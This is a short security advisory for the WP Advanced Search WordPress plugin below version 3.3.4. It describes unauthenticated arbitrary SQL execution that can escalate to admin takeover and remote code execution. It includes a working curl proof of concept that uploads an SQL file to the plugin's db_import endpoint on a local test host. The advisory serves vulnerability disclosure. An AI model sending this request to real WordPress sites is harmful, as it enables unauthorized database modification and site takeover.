WP Advanced Search < 3.3.4 – Unauthenticated Database Access and Remote Code Execution (RCE)

Description

Arbitrary database queries can be executed in an unauthenticated context of the "WP-Advanced-Search Plugin". E.g. a new administrative account could be added to the WordPress instance, a malicious plugin deployed and therefore Remote Code Execution (RCE) would be possible in the end.

Proof of Concept

# PoC: Update the admin's display name
curl -i -s -k -X $'POST' \
    -H $'Host: 127.0.0.1:8000' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------484865952156175792666168121' -H $'Content-Length: 302' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    --data-binary $'-----------------------------484865952156175792666168121\x0d\x0aContent-Disposition: form-data; name=\"wp_advanced_search_file_import\"; filename=\"test.sql\"\x0d\x0aContent-Type: application/sql\x0d\x0a\x0d\x0aupdate wp_users set display_name=\"Frycos\" where id = 1;\x0a\x0d\x0a-----------------------------484865952156175792666168121--\x0d\x0a' \
    $'http://127.0.0.1:8000/wp-admin/admin-post.php?action=db_import'